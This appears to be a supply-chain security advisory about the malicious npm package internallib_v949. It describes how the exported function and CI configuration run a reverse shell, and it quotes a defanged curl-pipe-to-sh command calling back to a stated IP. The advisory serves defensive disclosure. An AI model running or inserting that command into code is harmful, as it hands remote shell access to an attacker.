internallib_v949@1.0.3
Malicious code in internallib_v949 (npm)
T1059.007 · JavaScriptT1105 · Ingress Tool TransferT1071.001 · Web Protocols
Analysis
The package's only exported function (index.js, command()) executes a reverse shell: it runs `curl hxxps://reverse-shell[.]sh/10[.]0[.]16[.]19:443|sh` via /bin/bash, connecting back to 10[.]0[.]16[.]19 on port 443. The bundled check.js requires the package and invokes command(), and the included .gitlab-ci.yml runs `node check.js`, so the payload also executes in CI pipelines. IOC: reverse-shell.sh / 10[.]0[.]16[.]19:443.
- analyzed by
- Leitwacht
- first seen
- Sep 18, 2026, 08:06 PM
- analyzed
- Sep 18, 2026, 08:07 PM
Related advisories
- tailwind-form-styles@0.5.1
- chai-as-indexed@7.2.8
- catwrestlingbird@1.0.0
- tailwindcss-form-utils@0.5.1
- chai-testing@1.1.4
- tailwindcss-form-ui@0.5.1
- @vitemirrorte/element-plus-vite-cli@2.9.1
- chai-as-core@7.0.8
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.